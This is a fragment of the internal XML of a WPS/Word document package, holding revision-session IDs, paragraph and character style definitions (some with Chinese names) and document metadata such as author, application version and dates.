    <w:rsid w:val="001D2C9F"/>
    <w:rsid w:val="001D7E53"/>
    <w:rsid w:val="001F246E"/>
    <w:rsid w:val="001F67E2"/>
    <w:rsid w:val="002002B4"/>
    <w:rsid w:val="0020685D"/>
    <w:rsid w:val="0021505E"/>
    <w:rsid w:val="002173BB"/>
    <w:rsid w:val="00225F67"/>
    <w:rsid w:val="002348B3"/>
    <w:rsid w:val="002352CF"/>
    <w:rsid w:val="00242762"/>
    <w:rsid w:val="002435B6"/>
    <w:rsid w:val="00243AFD"/>
    <w:rsid w:val="00253B11"/>
    <w:rsid w:val="00253EB1"/>
    <w:rsid w:val="00260A24"/>
    <w:rsid w:val="00270073"/>
    <w:rsid w:val="00271B19"/>
    <w:rsid w:val="0029008B"/>
    <w:rsid w:val="002918D4"/>
    <w:rsid w:val="002A5B86"/>
    <w:rsid w:val="002B04F9"/>
    <w:rsid w:val="002C53E8"/>
    <w:rsid w:val="002D0B56"/>
    <w:rsid w:val="002D0DEB"/>
    <w:rsid w:val="002D2923"/>
    <w:rsid w:val="002E6117"/>
    <w:rsid w:val="002F5227"/>
    <w:rsid w:val="002F5762"/>
    <w:rsid w:val="00301BAE"/>
    <w:rsid w:val="0030690E"/>
    <w:rsid w:val="00321E0A"/>
    <w:rsid w:val="003226C0"/>
    <w:rsid w:val="00322B37"/>
    <w:rsid w:val="003248F1"/>
    <w:rsid w:val="00331955"/>
    <w:rsid w:val="00335E0A"/>
    <w:rsid w:val="003527E9"/>
    <w:rsid w:val="00361976"/>
    <w:rsid w:val="00362239"/>
    <w:rsid w:val="00363BDB"/>
    <w:rsid w:val="00372212"/>
    <w:rsid w:val="00377633"/>
    <w:rsid w:val="003827BC"/>
    <w:rsid w:val="00385A5A"/>
    <w:rsid w:val="003B0059"/>
    <w:rsid w:val="003B37F0"/>
    <w:rsid w:val="003B54D6"/>
    <w:rsid w:val="003C24F8"/>
    <w:rsid w:val="003D104A"/>
    <w:rsid w:val="003D10AA"/>
    <w:rsid w:val="003D1CEF"/>
    <w:rsid w:val="003D1EA1"/>
    <w:rsid w:val="003D56CE"/>
    <w:rsid w:val="003E0DBC"/>
    <w:rsid w:val="003E1511"/>
    <w:rsid w:val="003E1B00"/>
    <w:rsid w:val="003E24C9"/>
    <w:rsid w:val="003F65E4"/>
    <w:rsid w:val="00415756"/>
    <w:rsid w:val="00432DDE"/>
    <w:rsid w:val="00436E12"/>
    <w:rsid w:val="004378DB"/>
    <w:rsid w:val="004500F4"/>
    <w:rsid w:val="00452BBC"/>
    <w:rsid w:val="004538C1"/>
    <w:rsid w:val="00454C66"/>
    <w:rsid w:val="0045527A"/>
    <w:rsid w:val="00462E52"/>
    <w:rsid w:val="004672C5"/>
    <w:rsid w:val="00470314"/>
    <w:rsid w:val="00473BB2"/>
    <w:rsid w:val="00473CC1"/>
    <w:rsid w:val="004747DE"/>
    <w:rsid w:val="004756EE"/>
    <w:rsid w:val="00483DE7"/>
    <w:rsid w:val="00493D60"/>
    <w:rsid w:val="00495BF3"/>
    <w:rsid w:val="004A3B20"/>
    <w:rsid w:val="004A4A80"/>
    <w:rsid w:val="004B426F"/>
    <w:rsid w:val="004B5535"/>
    <w:rsid w:val="004C1B54"/>
    <w:rsid w:val="004C5F2B"/>
    <w:rsid w:val="004C626E"/>
    <w:rsid w:val="004C7055"/>
    <w:rsid w:val="004D6348"/>
    <w:rsid w:val="004E6C0F"/>
    <w:rsid w:val="004F5B0A"/>
    <w:rsid w:val="005016E1"/>
    <w:rsid w:val="005034A5"/>
    <w:rsid w:val="0050790F"/>
    <w:rsid w:val="00513C36"/>
    <w:rsid w:val="00515160"/>
    <w:rsid w:val="005155C1"/>
    <w:rsid w:val="005211A0"/>
    <w:rsid w:val="0052231A"/>
    <w:rsid w:val="005236D3"/>
    <w:rsid w:val="0053291F"/>
    <w:rsid w:val="00535A15"/>
    <w:rsid w:val="00540D33"/>
    <w:rsid w:val="0054668A"/>
    <w:rsid w:val="00550A6E"/>
    <w:rsid w:val="00552B5B"/>
    <w:rsid w:val="00554E61"/>
    <w:rsid w:val="005631D5"/>
    <w:rsid w:val="00565187"/>
    <w:rsid w:val="005809B9"/>
    <w:rsid w:val="005A1673"/>
    <w:rsid w:val="005A59A3"/>
    <w:rsid w:val="005A6D1B"/>
    <w:rsid w:val="005B4E44"/>
    <w:rsid w:val="005C53B9"/>
    <w:rsid w:val="005C7A8D"/>
    <w:rsid w:val="005D3CA7"/>
    <w:rsid w:val="005D3E5A"/>
    <w:rsid w:val="005E2700"/>
    <w:rsid w:val="005F580B"/>
    <w:rsid w:val="006013DF"/>
    <w:rsid w:val="00614245"/>
    <w:rsid w:val="00630666"/>
    <w:rsid w:val="0064108C"/>
    <w:rsid w:val="00641CFD"/>
    <w:rsid w:val="00657722"/>
    <w:rsid w:val="00660C54"/>
    <w:rsid w:val="006616CC"/>
    <w:rsid w:val="00661A43"/>
    <w:rsid w:val="00690614"/>
    <w:rsid w:val="006922BE"/>
    <w:rsid w:val="0069704B"/>
    <w:rsid w:val="006A199C"/>
    <w:rsid w:val="006B090F"/>
    <w:rsid w:val="006B11D3"/>
    <w:rsid w:val="006B7EA5"/>
    <w:rsid w:val="006C467C"/>
    <w:rsid w:val="006C533A"/>
    <w:rsid w:val="006D6559"/>
    <w:rsid w:val="006D674A"/>
    <w:rsid w:val="006E3467"/>
    <w:rsid w:val="006E4B8A"/>
    <w:rsid w:val="006E4D33"/>
    <w:rsid w:val="006F2C2C"/>
    <w:rsid w:val="006F2DB4"/>
    <w:rsid w:val="006F54DC"/>
    <w:rsid w:val="007035E5"/>
    <w:rsid w:val="00704693"/>
    <w:rsid w:val="007049EE"/>
    <w:rsid w:val="00704CCB"/>
    <w:rsid w:val="00706DCA"/>
    <w:rsid w:val="007131A4"/>
    <w:rsid w:val="007310C0"/>
    <w:rsid w:val="00736506"/>
    <w:rsid w:val="007449C7"/>
    <w:rsid w:val="00752A97"/>
    <w:rsid w:val="00754336"/>
    <w:rsid w:val="00755EDB"/>
    <w:rsid w:val="00766963"/>
    <w:rsid w:val="007722E8"/>
    <w:rsid w:val="00773C63"/>
    <w:rsid w:val="0078350C"/>
    <w:rsid w:val="007840B8"/>
    <w:rsid w:val="00784854"/>
    <w:rsid w:val="00785AE5"/>
    <w:rsid w:val="00791885"/>
    <w:rsid w:val="00792D60"/>
    <w:rsid w:val="00794B6D"/>
    <w:rsid w:val="007B1B5B"/>
    <w:rsid w:val="007C4D37"/>
    <w:rsid w:val="007D01AD"/>
    <w:rsid w:val="007D06E7"/>
    <w:rsid w:val="007E2C22"/>
    <w:rsid w:val="007E3695"/>
    <w:rsid w:val="007E3C37"/>
    <w:rsid w:val="007F37C6"/>
    <w:rsid w:val="008017A2"/>
    <w:rsid w:val="008068DE"/>
    <w:rsid w:val="008069AF"/>
    <w:rsid w:val="00807D5E"/>
    <w:rsid w:val="008108A0"/>
    <w:rsid w:val="00816F51"/>
    <w:rsid w:val="00822E4A"/>
    <w:rsid w:val="008276DE"/>
    <w:rsid w:val="00835722"/>
    <w:rsid w:val="00840EBB"/>
    <w:rsid w:val="0084230C"/>
    <w:rsid w:val="00853B55"/>
    <w:rsid w:val="008624D6"/>
    <w:rsid w:val="00862A72"/>
    <w:rsid w:val="00866A97"/>
    <w:rsid w:val="0088031F"/>
    <w:rsid w:val="00886195"/>
    <w:rsid w:val="00893F81"/>
    <w:rsid w:val="00896DB7"/>
    <w:rsid w:val="008A3CB5"/>
    <w:rsid w:val="008A6657"/>
    <w:rsid w:val="008B7E51"/>
    <w:rsid w:val="008D7162"/>
    <w:rsid w:val="008E0060"/>
    <w:rsid w:val="008E184C"/>
    <w:rsid w:val="008E34AD"/>
    <w:rsid w:val="008F3D39"/>
    <w:rsid w:val="008F3F8C"/>
    <w:rsid w:val="008F7344"/>
    <w:rsid w:val="008F7351"/>
    <w:rsid w:val="008F7B83"/>
    <w:rsid w:val="009125F6"/>
    <w:rsid w:val="009313CB"/>
    <w:rsid w:val="00936067"/>
    <w:rsid w:val="009407A1"/>
    <w:rsid w:val="00941FA6"/>
    <w:rsid w:val="00942D5A"/>
    <w:rsid w:val="009567D2"/>
    <w:rsid w:val="00975569"/>
    <w:rsid w:val="00984916"/>
    <w:rsid w:val="00991E1C"/>
    <w:rsid w:val="0099581B"/>
    <w:rsid w:val="009A0CD6"/>
    <w:rsid w:val="009A25B1"/>
    <w:rsid w:val="009D0F1B"/>
    <w:rsid w:val="009E4B9E"/>
    <w:rsid w:val="009F0FAE"/>
    <w:rsid w:val="009F2962"/>
    <w:rsid w:val="009F2FCA"/>
    <w:rsid w:val="009F42FB"/>
    <w:rsid w:val="009F4DC7"/>
    <w:rsid w:val="00A05800"/>
    <w:rsid w:val="00A068C5"/>
    <w:rsid w:val="00A06A57"/>
    <w:rsid w:val="00A109F0"/>
    <w:rsid w:val="00A112B7"/>
    <w:rsid w:val="00A15A95"/>
    <w:rsid w:val="00A21C33"/>
    <w:rsid w:val="00A22175"/>
    <w:rsid w:val="00A254ED"/>
    <w:rsid w:val="00A34E12"/>
    <w:rsid w:val="00A35754"/>
    <w:rsid w:val="00A42273"/>
    <w:rsid w:val="00A56DBE"/>
    <w:rsid w:val="00A6141C"/>
    <w:rsid w:val="00A6600B"/>
    <w:rsid w:val="00A70AB5"/>
    <w:rsid w:val="00A92A5C"/>
    <w:rsid w:val="00AA5564"/>
    <w:rsid w:val="00AA6132"/>
    <w:rsid w:val="00AA6545"/>
    <w:rsid w:val="00AB0BDB"/>
    <w:rsid w:val="00AC76CA"/>
    <w:rsid w:val="00AD07CD"/>
    <w:rsid w:val="00B0197C"/>
    <w:rsid w:val="00B035B2"/>
    <w:rsid w:val="00B035F4"/>
    <w:rsid w:val="00B175E7"/>
    <w:rsid w:val="00B230CD"/>
    <w:rsid w:val="00B24E62"/>
    <w:rsid w:val="00B31922"/>
    <w:rsid w:val="00B45DCC"/>
    <w:rsid w:val="00B461EE"/>
    <w:rsid w:val="00B505AE"/>
    <w:rsid w:val="00B52618"/>
    <w:rsid w:val="00B52840"/>
    <w:rsid w:val="00B53F71"/>
    <w:rsid w:val="00B578A1"/>
    <w:rsid w:val="00B6649B"/>
    <w:rsid w:val="00B81A8F"/>
    <w:rsid w:val="00B858C3"/>
    <w:rsid w:val="00B953E7"/>
    <w:rsid w:val="00BA2617"/>
    <w:rsid w:val="00BA5F3C"/>
    <w:rsid w:val="00BB72B0"/>
    <w:rsid w:val="00BC05B2"/>
    <w:rsid w:val="00BC0A6F"/>
    <w:rsid w:val="00BC6065"/>
    <w:rsid w:val="00BC62F7"/>
    <w:rsid w:val="00BD16CE"/>
    <w:rsid w:val="00BD6B15"/>
    <w:rsid w:val="00BE260E"/>
    <w:rsid w:val="00BE7636"/>
    <w:rsid w:val="00BF174F"/>
    <w:rsid w:val="00C0413C"/>
    <w:rsid w:val="00C051DE"/>
    <w:rsid w:val="00C20AC7"/>
    <w:rsid w:val="00C2541E"/>
    <w:rsid w:val="00C25C34"/>
    <w:rsid w:val="00C30F8B"/>
    <w:rsid w:val="00C41490"/>
    <w:rsid w:val="00C45309"/>
    <w:rsid w:val="00C47DAA"/>
    <w:rsid w:val="00C514C6"/>
    <w:rsid w:val="00C53264"/>
    <w:rsid w:val="00C5638E"/>
    <w:rsid w:val="00C666F0"/>
    <w:rsid w:val="00C77D57"/>
    <w:rsid w:val="00C90C5A"/>
    <w:rsid w:val="00C95392"/>
    <w:rsid w:val="00C97C47"/>
    <w:rsid w:val="00CA7033"/>
    <w:rsid w:val="00CC1904"/>
    <w:rsid w:val="00CC77B1"/>
    <w:rsid w:val="00CD3DDB"/>
    <w:rsid w:val="00CD62F2"/>
    <w:rsid w:val="00CE5F2F"/>
    <w:rsid w:val="00CF2FB0"/>
    <w:rsid w:val="00CF4AF7"/>
    <w:rsid w:val="00CF733C"/>
    <w:rsid w:val="00CF7EB9"/>
    <w:rsid w:val="00D00D30"/>
    <w:rsid w:val="00D01E46"/>
    <w:rsid w:val="00D0227D"/>
    <w:rsid w:val="00D11796"/>
    <w:rsid w:val="00D1203A"/>
    <w:rsid w:val="00D2725D"/>
    <w:rsid w:val="00D31839"/>
    <w:rsid w:val="00D37018"/>
    <w:rsid w:val="00D404EE"/>
    <w:rsid w:val="00D467F2"/>
    <w:rsid w:val="00D57475"/>
    <w:rsid w:val="00D62973"/>
    <w:rsid w:val="00D630A0"/>
    <w:rsid w:val="00D636DA"/>
    <w:rsid w:val="00DA1B44"/>
    <w:rsid w:val="00DA20BB"/>
    <w:rsid w:val="00DA4E49"/>
    <w:rsid w:val="00DA636E"/>
    <w:rsid w:val="00DB4B5C"/>
    <w:rsid w:val="00DC2069"/>
    <w:rsid w:val="00DC3EDC"/>
    <w:rsid w:val="00DD3035"/>
    <w:rsid w:val="00DD57D9"/>
    <w:rsid w:val="00DD6FEF"/>
    <w:rsid w:val="00DE4A92"/>
    <w:rsid w:val="00DF126D"/>
    <w:rsid w:val="00DF53A1"/>
    <w:rsid w:val="00DF761A"/>
    <w:rsid w:val="00E0301B"/>
    <w:rsid w:val="00E04577"/>
    <w:rsid w:val="00E05CBB"/>
    <w:rsid w:val="00E06C1B"/>
    <w:rsid w:val="00E1061E"/>
    <w:rsid w:val="00E12E81"/>
    <w:rsid w:val="00E20445"/>
    <w:rsid w:val="00E25991"/>
    <w:rsid w:val="00E27496"/>
    <w:rsid w:val="00E33EFB"/>
    <w:rsid w:val="00E36A51"/>
    <w:rsid w:val="00E4066C"/>
    <w:rsid w:val="00E411B4"/>
    <w:rsid w:val="00E41A15"/>
    <w:rsid w:val="00E42F92"/>
    <w:rsid w:val="00E43EBC"/>
    <w:rsid w:val="00E474FF"/>
    <w:rsid w:val="00E47D0A"/>
    <w:rsid w:val="00E52F5B"/>
    <w:rsid w:val="00E71B1F"/>
    <w:rsid w:val="00E77812"/>
    <w:rsid w:val="00E83A0B"/>
    <w:rsid w:val="00EA2E50"/>
    <w:rsid w:val="00EA3E9B"/>
    <w:rsid w:val="00EC01B3"/>
    <w:rsid w:val="00EC2814"/>
    <w:rsid w:val="00EC5457"/>
    <w:rsid w:val="00EC77A9"/>
    <w:rsid w:val="00ED0D86"/>
    <w:rsid w:val="00EE2642"/>
    <w:rsid w:val="00EF1F15"/>
    <w:rsid w:val="00EF7758"/>
    <w:rsid w:val="00EF7B71"/>
    <w:rsid w:val="00F01525"/>
    <w:rsid w:val="00F07399"/>
    <w:rsid w:val="00F12AC6"/>
    <w:rsid w:val="00F13008"/>
    <w:rsid w:val="00F16F6F"/>
    <w:rsid w:val="00F22F2D"/>
    <w:rsid w:val="00F26A01"/>
    <w:rsid w:val="00F2738B"/>
    <w:rsid w:val="00F3477E"/>
    <w:rsid w:val="00F35A77"/>
    <w:rsid w:val="00F36079"/>
    <w:rsid w:val="00F418BA"/>
    <w:rsid w:val="00F421AE"/>
    <w:rsid w:val="00F530A3"/>
    <w:rsid w:val="00F56E34"/>
    <w:rsid w:val="00F57E72"/>
    <w:rsid w:val="00F65614"/>
    <w:rsid w:val="00F71779"/>
    <w:rsid w:val="00F72AB7"/>
    <w:rsid w:val="00F76914"/>
    <w:rsid w:val="00F77762"/>
    <w:rsid w:val="00F83210"/>
    <w:rsid w:val="00F91B43"/>
    <w:rsid w:val="00F96D46"/>
    <w:rsid w:val="00F96D54"/>
    <w:rsid w:val="00F97EB1"/>
    <w:rsid w:val="00F97FC2"/>
    <w:rsid w:val="00FA4347"/>
    <w:rsid w:val="00FA503F"/>
    <w:rsid w:val="00FA60A9"/>
    <w:rsid w:val="00FB0BD3"/>
    <w:rsid w:val="00FB6D6B"/>
    <w:rsid w:val="00FC0105"/>
    <w:rsid w:val="00FC0132"/>
    <w:rsid w:val="00FC1252"/>
    <w:rsid w:val="00FC6ABC"/>
    <w:rsid w:val="00FD0F6D"/>
    <w:rsid w:val="00FD7953"/>
    <w:rsid w:val="00FE0AC1"/>
    <w:rsid w:val="00FE21ED"/>
    <w:rsid w:val="00FE4F54"/>
    <w:rsid w:val="00FF3591"/>
    <w:rsid w:val="1EEFD091"/>
    <w:rsid w:val="1FBE8A68"/>
    <w:rsid w:val="2A95CAAD"/>
    <w:rsid w:val="2AFDEA35"/>
    <w:rsid w:val="2B39EB2A"/>
    <w:rsid w:val="3D2D20A5"/>
    <w:rsid w:val="3DECEA3C"/>
    <w:rsid w:val="3DF5915B"/>
    <w:rsid w:val="3FF4E5FC"/>
    <w:rsid w:val="44F3C411"/>
    <w:rsid w:val="4ABF8E22"/>
    <w:rsid w:val="578FA71E"/>
    <w:rsid w:val="5AEF9FD7"/>
    <w:rsid w:val="5CFE7592"/>
    <w:rsid w:val="5D6F9F25"/>
    <w:rsid w:val="5D7B0783"/>
    <w:rsid w:val="5EBF66DC"/>
    <w:rsid w:val="5EEE0A6A"/>
    <w:rsid w:val="5F5D8CBC"/>
    <w:rsid w:val="66FF8627"/>
    <w:rsid w:val="675FEF90"/>
    <w:rsid w:val="67BB02E4"/>
    <w:rsid w:val="67FEB7CD"/>
    <w:rsid w:val="6A5E8C8E"/>
    <w:rsid w:val="6BD39EAE"/>
    <w:rsid w:val="6CDF7DE8"/>
    <w:rsid w:val="6E79CB99"/>
    <w:rsid w:val="6FDF9420"/>
    <w:rsid w:val="71DB5F10"/>
    <w:rsid w:val="736FD2D0"/>
    <w:rsid w:val="75FE1BC3"/>
    <w:rsid w:val="7731DD35"/>
    <w:rsid w:val="77740F05"/>
    <w:rsid w:val="77FFAED3"/>
    <w:rsid w:val="78FF42E4"/>
    <w:rsid w:val="79B32956"/>
    <w:rsid w:val="7A5F45C7"/>
    <w:rsid w:val="7AFB3E9A"/>
    <w:rsid w:val="7B9B1C50"/>
    <w:rsid w:val="7BA7E862"/>
    <w:rsid w:val="7BF5E2EC"/>
    <w:rsid w:val="7C6F1B0B"/>
    <w:rsid w:val="7CFF0A22"/>
    <w:rsid w:val="7EFD4F2F"/>
    <w:rsid w:val="7F234411"/>
    <w:rsid w:val="7F3EF2DD"/>
    <w:rsid w:val="7F579A4B"/>
    <w:rsid w:val="7F7FB419"/>
    <w:rsid w:val="7F8586A6"/>
    <w:rsid w:val="7FA739AB"/>
    <w:rsid w:val="7FDE8BED"/>
    <w:rsid w:val="7FEEB2D0"/>
    <w:rsid w:val="7FFAFBBE"/>
    <w:rsid w:val="7FFE26FA"/>
    <w:rsid w:val="7FFED048"/>
    <w:rsid w:val="7FFFBC1C"/>
    <w:rsid w:val="97DFC64C"/>
    <w:rsid w:val="9E6F41FD"/>
    <w:rsid w:val="A6F34E26"/>
    <w:rsid w:val="A7AE0429"/>
    <w:rsid w:val="ABF73628"/>
    <w:rsid w:val="AFE7825E"/>
    <w:rsid w:val="B4F3A1FA"/>
    <w:rsid w:val="B8E6F12F"/>
    <w:rsid w:val="BBDF79FD"/>
    <w:rsid w:val="BDBB18D4"/>
    <w:rsid w:val="CB37DE53"/>
    <w:rsid w:val="CDAE4AC8"/>
    <w:rsid w:val="D1BBDD73"/>
    <w:rsid w:val="D7B7ADC8"/>
    <w:rsid w:val="D7FFD281"/>
    <w:rsid w:val="DA7FB527"/>
    <w:rsid w:val="DB170CE4"/>
    <w:rsid w:val="DFD6F656"/>
    <w:rsid w:val="DFFBC1C3"/>
    <w:rsid w:val="E3DE4018"/>
    <w:rsid w:val="EDDE715E"/>
    <w:rsid w:val="EF6FE888"/>
    <w:rsid w:val="EFBE29F3"/>
    <w:rsid w:val="EFF78FDE"/>
    <w:rsid w:val="F1DF14B1"/>
    <w:rsid w:val="F3B13FE9"/>
    <w:rsid w:val="F3FFA640"/>
    <w:rsid w:val="F57E859A"/>
    <w:rsid w:val="F77FD32F"/>
    <w:rsid w:val="F79FDF53"/>
    <w:rsid w:val="F7BF6403"/>
    <w:rsid w:val="F7CFF265"/>
    <w:rsid w:val="F7DFE0ED"/>
    <w:rsid w:val="F7FB8180"/>
    <w:rsid w:val="F7FF46DF"/>
    <w:rsid w:val="F97E1139"/>
    <w:rsid w:val="F9DFCE5F"/>
    <w:rsid w:val="FB6FB952"/>
    <w:rsid w:val="FBF34EB0"/>
    <w:rsid w:val="FCDF3815"/>
    <w:rsid w:val="FD7F6C71"/>
    <w:rsid w:val="FE1FEF67"/>
    <w:rsid w:val="FEE0CB9A"/>
    <w:rsid w:val="FEF5AD1D"/>
    <w:rsid w:val="FEFF021A"/>
    <w:rsid w:val="FFDF1A1A"/>
    <w:rsid w:val="FFF50B72"/>
    <w:rsid w:val="FFF7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opLinePunct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pageBreakBefore/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="100" w:beforeLines="100" w:after="100" w:afterLines="100"/>
      <w:jc w:val="center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numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="100" w:beforeLines="100" w:after="50" w:afterLines="50"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr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b/>
      <w:bCs/>
      <w:szCs w:val="32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Number"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1246"/>
        <w:tab w:val="clear" w:pos="680"/>
      </w:tabs>
      <w:ind w:left="1274" w:hanging="364"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
      </w:tabs>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="907" w:leftChars="400"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/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  <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="341"/>
        <w:tab w:val="right" w:leader="middleDot" w:pos="9080"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="454"/>
        <w:tab w:val="right" w:leader="middleDot" w:pos="9080"/>
      </w:tabs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Body Text First Indent"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="17">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="1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page number"/>
    <w:basedOn w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="20">
    <w:name w:val="Hyperlink"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="21">
    <w:name w:val="图标题"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="22">
    <w:name w:val="表标题"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeLines="100"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="标题 1 字符"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="24">
    <w:name w:val="标题 2 字符"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2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gs</Company>
  <Pages>14</Pages>
  <Words>604</Words>
  <Characters>781</Characters>
  <Lines>13</Lines>
  <Paragraphs>3</Paragraphs>
  <TotalTime>89</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>866</CharactersWithSpaces>
  <Application>WPS Office_12.8.2.18605_F1E327BC-269C-435d-A152-05C5408002CA</Application>
  <DocSecurity>5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2023-11-29T05:58:00Z</dcterms:created>
  <dc:creator>林乘芳</dc:creator>
  <cp:lastModifiedBy>xiaoke</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-30T14:37:08Z</dcterms:modified>
  <dc:title>摘要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2052-12.8.2.18605</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>E05D47C62B9037EBC23F6465CF17B4BD_42</vt:lpwstr>
  </property>
</Properties>
</file>